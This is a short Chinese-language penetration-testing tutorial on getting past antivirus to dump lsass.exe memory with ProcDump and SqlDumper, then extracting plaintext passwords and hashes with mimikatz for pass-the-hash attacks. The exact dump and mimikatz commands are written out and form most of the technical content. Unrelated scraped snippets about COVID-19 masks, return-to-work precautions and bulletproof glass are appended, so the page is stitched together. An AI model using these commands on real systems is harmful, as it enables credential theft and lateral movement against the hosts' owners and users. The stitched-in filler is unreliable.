前言
内网渗透时,获得主机管理员权限后,通常会抓取用户的明文密码或hash,进行pth攻击。
大部分情况会遇到防护软件,常规抓取 *** 失效,因此需要对防护进行绕过。
Procdump.exe
Procdump是微软官方发布的工具,使用该工具可以把lsass的内存dump下来,可以绕过大多数的防护软件。
首先使用procdump.exe把进程lsass.exe 的内存dump下来
procdump.exe -accepteula -ma lsass.exe lsass.dmp
实战中把 lsass.dmp 下载下来,在相同版本的操作系统使用mimikatz读取密码hash。
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
SqlDumper.exe
SqlDumper也属于微软出品,存在于SQL Server文件夹中,大多数杀软不会拦截。
默认存放在C:\Program Files\Microsoft SQL Server\number\Shared,number代表SQL Server的版本。
如果目标机器没有安装SQL Server,可以自己上传SqlDumper.exe。
tasklist /svc | findstr lsass.exe 查看lsass.exe 的PID号 Sqldumper.exe ProcessID 0 0x01100 导出mdmp文件
实战中下把生成的mdmp文件下载到本地,使用相同的操作系统打开。
mimikatz.exe "sekurlsa::minidump SQLDmpr0001.mdmp" "sekurlsa::logonPasswords full" exit
近三天新增病例每天都超一千,这个高峰说明了什么?接下来的疫情走向如何?这次疫情能简单和SARS对比吗?上班后,食堂集中就餐怎么防护? 在1月30日晚播出的《新闻1+1》节目中,白岩松连线中国疾控中心...
针对新型冠状病毒肺炎病例的出现,医生建议佩戴医用外科口罩和N95口罩,N95口罩的阻挡病毒的效果更好,但是透气性稍差,n95口罩能预防新型冠状病毒吗?n95口罩怎么选择?下面友谊长存带来介绍。 n9...
国家卫健委发布会,建议复工后各单位错峰吃饭,针对返程务工人员应如何防护感染新型肺炎,中国疾控中心传染病处研究员冯录召2日在国家卫健委发布会上表示,务工人员返程前应先做好体温测量,有可疑症...
目前N95口罩被很多人抢购一空,一些没有购买到N95口罩的担心是否必须要佩戴才能预防,除此之外,对于N95口罩很多人都不了解其实一次性的,那么,预防新型冠状病毒必须佩戴N95口罩吗?下面友谊长存小编就...
疫情当前,返工人员如何做好防护措施?这份返程复工防护路线图说全了都听话!...
一些人会见到市场上有防弹玻璃售卖,防弹玻璃最大的好处是带来安全性,它属于特殊性质的玻璃,可以连子弹都防好,防弹玻璃防护原理是什么?一些富豪或是家里经济条件比较好,也需要在窗户上安装防弹玻璃,防弹玻璃品...